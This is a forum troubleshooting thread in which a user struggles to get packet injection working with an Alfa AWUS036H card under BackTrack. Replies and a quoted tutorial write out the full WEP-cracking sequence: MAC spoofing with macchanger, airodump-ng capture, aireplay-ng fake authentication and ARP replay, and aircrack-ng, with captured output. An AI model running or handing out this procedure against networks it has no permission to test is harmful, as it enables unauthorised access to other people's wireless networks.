Page 1 of 2 12 LastLast
Results 1 to 10 of 17

Thread: Help! AWUS036H tormenting me...

  1. #1
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    9

    Default Help! AWUS036H tormenting me...

    First of all, can't tell you how many tutorials I have read trying to get this to work. It's very frustrating seeing everyone say how well their card seems to be working and my card still apparently sucks. My problem is apparently this error message:
    -------
    Sending Authentification Request (Open System) [ACK]
    Sending Authentication Request (Open System) [ACK]
    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
    the transmit rate.

    ---------
    I have made sure the MAC filtering was not on (having used 3 different router models including a linksys, d-link and SMC Barricade, which my brother borrows for testing purposes from work)

    I've checked and rechecked the BSSID to make sure it's correct.

    I've seen tutorials talking about changing the number of packets, and a change in the command apparently does nothing.

    My card is supposedly on the list of injectable cards.

    I've rechecked the channel to make sure it's in sync with the router.

    And I've been every where from a foot away to the other side of the house in terms of distance from the AP.

    So, what gives.

    Here's one of the tutorials (from Xploitz) I have tried:

    airmon-ng stop ath0
    ifconfig wifi0 down
    macchanger --mac 00:11:22:33:44:55 wifi0
    airmon-ng start wifi0
    airodump-ng ath0
    break & copy bssid
    airodump-ng -c 11 -w test --bssid (AP) ath0
    (the next line is where my problem occurs)
    aireplay-ng -1 0 -e belkin54g -a (AP) -h 00:11:22:33:44:55 ath0 *success*
    **ok at this point here, you should have your smiley face showing success**
    aireplay-ng -3 -b (AP) -h 00:11:22:33:44:55 ath0
    **note if there is no activity, the ARP's will not increase - means NO ivs**
    so be patient, i had 2 wait for around 6 mins before this worked & got approx 300K IV's & cracked it in 00:00:00 seconds
    *** good tip i used was on the laptop i was using for as a client, i just pinged google -t
    aircrack-ng *.cap

    Here are my system stats:
    Alfa Network 802.11g High Power Wireless USB Adapter Model: AWUS036H
    13.3 Macbook 2 GHz Intel C2D, 2GB RAM,
    Mac OSX Leopard 10.5.3
    BackTrack 3 Beta (Also have tried BT2 Final)
    Vmware Fusion Version 2.0b1 (89933) (tried out ver 1.0 - 1.3 as well)


    Some help anyone?

  2. #2
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Well I can confirm that injection is supported out of the box for AWUS036H in BT3b so the problem is most likely to be found in your commands. You should post the actual commands that you use and not only the tutorial that you say that you have followed. This would make it easy for any of us to check that you do not have some error in them.

    However these commands should work fine for your Alfa card:
    Code:
    iwconfig wlan0 mode monitor
    macchanger -A wlan0
    airodump-ng wlan0 -c X --bssid XX:XX:XX:XX:XX:XX -w filename
    aireplay-ng -1 0 -e APname -a XX:XX:XX:XX:XX:XX wlan0
    aireplay-ng -3 -b XX:XX:XX:XX:XX:XX
    Just input the right channel number, name of the AP (only needed if it is cloaked) and BSSID of the AP.
    -Monkeys are like nature's humans.

  3. #3
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    9

    Default

    Quote Originally Posted by =Tron= View Post
    Well I can confirm that injection is supported out of the box for AWUS036H in BT3b so the problem is most likely to be found in your commands. You should post the actual commands that you use and not only the tutorial that you say that you have followed. This would make it easy for any of us to check that you do not have some error in them.

    However these commands should work fine for your Alfa card:
    Code:
    iwconfig wlan0 mode monitor
    macchanger -A wlan0
    airodump-ng wlan0 -c X --bssid XX:XX:XX:XX:XX:XX -w filename
    aireplay-ng -1 0 -e APname -a XX:XX:XX:XX:XX:XX wlan0
    aireplay-ng -3 -b XX:XX:XX:XX:XX:XX
    Just input the right channel number, name of the AP (only needed if it is cloaked) and BSSID of the AP.
    OK so I started up BT3, plugged in the alfa and open up a Terminal window:

    bt ~ # iwconfig wlan0 mode monitor
    bt ~ # macchanger -A wlan0
    Current MAC: 00:c0:ca:18:12:69 (Alfa, Inc.)
    Faked MAC: 00:09:22:d6:93:8f (Touchless Sensor Technology Ag)
    bt ~ # airodump-ng wlan0 -c 6 --bssid 00:19:E0:F9:A9:AA -w testing





    CH 6 ][ Elapsed: 4 mins ][ 2008-06-08 12:08

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ES

    00:19:E0:F9:A9:AA 13 2 1854 944 0 6 54. WEP WEP L

    BSSID STATION PWR Rate Lost Packets Probes

    00:19:E0:F9:A9:AA 00:18E:28:1C:A5 33 0-48 4 151
    00:19:E0:F9:A9:AA 00:1B:77:47:F9:5A 12 0- 1 0 95
    00:19:E0:F9:A9:AA 00:1E:C2:AA:4B:50 -1 1- 0 0 1034


    then I open up a new terminal window:

    bt ~ # aireplay-ng -1 0 -e Linksys -a 00:19:E0:F9:A9:AA wlan0
    No source MAC (-h) specified. Using the device MAC (00:09:226:93:8F)
    12:06:04 Waiting for beacon frame (BSSID: 00:19:E0:F9:A9:AA) on channel 6

    12:06:04 Sending Authentication Request (Open System)
    12:06:06 Sending Authentication Request (Open System)
    12:06:08 Sending Authentication Request (Open System)
    12:06:10 Sending Authentication Request (Open System)
    12:06:12 Sending Authentication Request (Open System)
    12:06:14 Sending Authentication Request (Open System)
    12:06:16 Sending Authentication Request (Open System)
    12:06:18 Sending Authentication Request (Open System)
    12:06:20 Sending Authentication Request (Open System)
    12:06:22 Sending Authentication Request (Open System)
    12:06:24 Sending Authentication Request (Open System)
    12:06:26 Sending Authentication Request (Open System)
    12:06:28 Sending Authentication Request (Open System)
    12:06:30 Sending Authentication Request (Open System)
    12:06:32 Sending Authentication Request (Open System)
    12:06:34 Sending Authentication Request (Open System)
    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
    the transmit rate.



    Is there a timeframe I should be considering when entering the aireplay-ng command, or a certain amout of data or something?

  4. #4
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Is there a timeframe I should be considering when entering the aireplay-ng command, or a certain amout of data or something?
    No there is no timeframe that you have to worry about. However, I am unable to find any error in the commands that you use, as I have successfully used them several times with my own Alfa card. But, are you able to connect to the AP successfully using the Alfa card and your WEP key?
    -Monkeys are like nature's humans.

  5. #5
    Senior Member Shatter's Avatar
    Join Date
    Jan 2010
    Posts
    192

    Default

    Curious...
    What is the output when you test the injection?
    aireplay-ng --test wlan0

    And have you tried lowering the tx rate?
    iwconfig wlan0 rate 1M

  6. #6
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    9

    Default

    Quote Originally Posted by =Tron= View Post
    No there is no timeframe that you have to worry about. However, I am unable to find any error in the commands that you use, as I have successfully used them several times with my own Alfa card. But, are you able to connect to the AP successfully using the Alfa card and your WEP key?
    I have no problems connecting to a WEP or WPA AES/TSK connection using the card.

  7. #7
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    9

    Default

    Quote Originally Posted by xCPPx View Post
    Curious...
    What is the output when you test the injection?
    aireplay-ng --test wlan0

    And have you tried lowering the tx rate?
    iwconfig wlan0 rate 1M
    on testing the injection I get this:

    bt ~ # aireplay-ng --test wlan0
    23:12:21 Trying broadcast probe requests...
    23:12:22 No Answer...
    23:12:22 Found 6 APs

    23:12:22 Trying directed probe requests...
    23:12:22 00:16:B6:3C:3F:74 - channel: 6 - 'aaa'
    23:12:29 0/30: 0%

    23:12:29 00:16:B6:04:01:51 - channel: 6 - 'bbb'
    23:12:35 0/30: 0%

    23:12:35 00:1D:7E:2E:7E:BA - channel: 6 - 'ccc'
    23:12:42 0/30: 0%

    23:12:42 00:18:39:B2:79:20 - channel: 6 - 'ddd'
    23:12:48 0/30: 0%

    23:12:48 00:11:95:7A:48:46 - channel: 6 - 'eee'
    23:12:55 0/30: 0%


    basically a few of the wireless internet locations nearby as well as my own....

    and lowering the bitrate, using the command u provided I rentered the commands from the second post but no change in response.

    I told you... it's tormenting me... it's evil.

  8. #8
    Just burned his ISO
    Join Date
    May 2008
    Posts
    6

    Default

    It is happening the exact same thing to me. Fake authentication does not work. And even if i only use the injection, it says that the injection is working, and i see the amount of packets sent, BUT, on aerodump its the same as nothing, like if injection wasnt working at all... I tried with a USB pen, a Linksys WUSB54GC, and again, same results... Im struggling to understand why this happens...

  9. #9
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Fake authentication does not work. And even if i only use the injection, it says that the injection is working, and i see the amount of packets sent, BUT, on aerodump its the same as nothing, like if injection wasnt working at all...
    You will not be able to successfully inject unless you are properly authenticated with the AP first.
    -Monkeys are like nature's humans.

  10. #10
    Just burned his ISO
    Join Date
    May 2008
    Posts
    6

    Default

    Quote Originally Posted by =Tron= View Post
    You will not be able to successfully inject unless you are properly authenticated with the AP first.
    Oh, i thought that by using a 2nd machine already connected to the AP that you could use injection using that machines mac address.

    Anyway, the problem remains, why cant it associate with neither of the devices?

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •